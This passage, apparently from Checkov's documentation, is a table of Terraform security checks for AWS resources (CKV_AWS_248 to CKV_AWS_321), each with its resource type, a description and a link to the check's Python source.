aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 348 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 349 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | +| 350 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 351 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 352 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | +| 353 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | +| 354 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | +| 355 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | +| 356 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | +| 357 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | +| 358 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | +| 359 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 360 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | +| 361 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 362 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 363 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 364 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 365 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 366 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | +| 367 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | +| 368 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | +| 369 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | +| 370 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | +| 371 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | +| 372 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | +| 373 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | +| 374 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | +| 375 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | +| 376 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | +| 377 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | +| 378 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 379 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 380 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 381 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 382 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 383 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 384 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | +| 385 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | +| 386 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 387 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 388 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 389 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | +| 390 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | +| 391 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | +| 392 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | +| 393 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | +| 394 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | +| 395 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | +| 396 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | +| 397 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 398 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 399 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 400 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 401 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 402 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 403 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 404 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 405 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 406 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 407 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 408 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 409 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 410 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 411 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 412 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 413 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 414 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 415 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 416 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 417 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 418 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 419 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 420 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 421 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 422 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 423 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | +| 424 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | +| 425 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | +| 426 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | +| 427 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | +| 428 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | +| 429 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | +| 430 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | +| 431 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | +| 432 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | +| 433 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | +| 434 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | +| 435 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | +| 436 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | +| 437 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | +| 438 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | +| 439 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | +| 440 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | +| 441 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | +| 442 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | +| 443 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | +| 444 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | +| 445 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | +| 446 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | +| 447 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 448 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 449 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | +| 450 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | +| 451 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) | +| 452 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) | +| 453 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure 